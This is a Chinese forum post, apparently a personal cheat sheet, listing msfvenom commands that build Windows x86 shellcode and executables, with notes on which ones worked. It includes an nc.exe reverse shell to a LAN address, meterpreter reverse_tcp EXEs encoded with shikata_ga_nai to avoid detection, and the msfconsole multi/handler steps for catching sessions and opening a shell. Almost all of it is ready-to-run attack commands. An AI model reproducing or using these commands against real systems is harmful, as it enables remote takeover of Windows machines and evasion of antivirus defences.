生成环境:kali-linux-2017.3-vm-amd64
生成软件:msfvenom
测试语句:
msfvenom -l | grep windows | grep x86 | grep tcp
msfvenom -l | grep windows //列出和windows相关的shellcode
msfvenom -l encoders //查看所有的可用的编码方式

//msfvenom生成shellcode的方法(for xp&win7&win10成功):
msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c

msfvenom -a x86 –platform windows -p windows/exec cmd="whoami >c:\test.txt" -e x86/alpha_mixed -f py

msfvenom -a x86 –platform windows -p windows/exec cmd="telnet 192.168.1.152 8000" -e x86/alpha_mixed -f c

msfvenom -a x86 –platform windows -p windows/exec cmd="c:\nc.exe 192.168.1.152 8000 -e cmd.exe" -e x86/alpha_mixed -f py //成功

msfvenom -a x86 -platform windows -p windows/messagebox TEXT="pt007" -e x86/alpha_mixed -f c //弹窗,未成功

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.157 lport=8000 -f c //不成功

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp lhost=192.168.1.152 lport=8000 -e x86/shikata_ga_nai -f c //生成shellcode,未成功

//生成exe文件,win7成功:(kali-linux-2017.3-vm-amd64)
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.157 lport=8000 -f exe >b2.exe

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=192.168.1.157 lport=8000 -e x86/shikata_ga_nai -b '\x00' -i 4 -f exe -o b21.exe

https://www.exploit-db.com/shellcode/ //在线生成shellcode

//msf下启动监听:
启动msf: msfconsole

使用模块:use exploit/multi/handler

设置payload: set payload windows/meterpreter/reverse_tcp

设置地址:set LHOST 192.168.1.157

设置端口:set LPORT 8000

exploit -j //后台运行
sessions //列出所有会话
sessions -i 1 //切换到会话1,下面进入meterpreter shell界面

ipconfig
sysinfo
shell

点击收藏 | 1 关注 | 1
登录 后跟帖